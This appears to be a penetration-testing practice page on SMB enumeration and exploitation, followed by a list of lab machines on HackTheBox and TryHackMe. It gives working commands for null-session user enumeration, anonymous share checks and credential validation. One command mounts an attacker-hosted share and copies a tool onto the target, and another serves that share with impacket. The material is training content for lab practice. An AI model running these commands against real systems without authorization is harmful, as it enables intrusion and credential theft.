ZeroBox

SMB Enumeration and Exploitation: practice machines and key commands

SMB exposes file shares, named pipes and RPC, so it is often the first place to look on Windows and Samba hosts. Start by checking for null or guest sessions, listing shares and reading anything that is world readable, since backups, scripts and configuration files frequently contain credentials. Tools such as smbclient, smbmap, rpcclient and NetExec cover share listing, user enumeration and password spraying. Writable shares can be abused to plant a payload or a poisoned file, and SMB signing status tells you whether relay attacks are realistic. On older systems, version-specific bugs and Samba misconfigurations can lead straight to a shell. Record every username you find; they feed Kerberos and password attacks later. These machines show SMB used as an entry point or as a source of loot.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

rpcclient Anonymous / Null Session User Enum

Establish null session to RPC endpoint and list domain users, groups, and password policy.

rpcclient -U "" -N {TARGET_IP} -c "enumdomusers; querydispinfo; enumdomgroups"

SMBMap Anonymous / Guest Share Check

Check SMB permissions across all shares anonymously without credentials.

smbmap -H {TARGET_IP} -u "" -p ""

NetExec / CrackMapExec Domain Sweep

Check SMB credentials validity, local admin status (Pwn3d!), and password policies.

nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares

SMB Share Drive Mount & Copy (Windows)

Mount remote attacker SMB share as network drive letter and copy tools.

net use Z: \\{LHOST}\share /user:guest "" && copy Z:\tool.exe C:\Temp\tool.exe

Impacket SMB Server File Share

Host local folder as unauthenticated SMB share accessible by Windows machines.

sudo impacket-smbserver share $(pwd) -smb2support

Keep going

SMB Enumeration and Exploitation machines (13)

2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 9 Windows, 4 Linux.

Very Easy (2)

MachinePlatformOSTags
DancingHTBWindowsSMB, Share Enumeration, smbclient
TacticsHTBWindowssmb, administrator, share, starting-point

Easy (4)

MachinePlatformOSTags
Active Directory EnumerationTHMWindowsActive Directory, Enumeration, PowerView, BloodHound
BlueTHMWindowsOSCP, EternalBlue, MS17-010, SMB
KenobiTHMLinuxOSCP, Samba, ProFTPD, SUID
SkynetTHMLinuxOSCP, Samba, SquirrelMail, Cuppa CMS

Medium (4)

MachinePlatformOSTags
BastionHTBWindowsExploiting-MRemoteNG, SAM Hive, SMB, VHD
RelevantTHMWindowsOSCP, SMB, IIS, WebShell
ResoluteHTBWindowsActive Directory, DLL Injection, DNSAdmins, DnsAdmins-Abuse
ZaTHMWindowsActive Directory, Kerberos, BloodHound, GPO Abuse

Hard (3)

MachinePlatformOSTags
BlackfieldHTBWindowsAS-REP Roasting, Active Directory, Anonymous-/-Guest, BloodHound
CherryBlossomTHMLinuxTHM, nmap, smbclient, base64
VulnNet: InternalTHMLinuxSMB, Redis, TeamCity, Tunneling

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox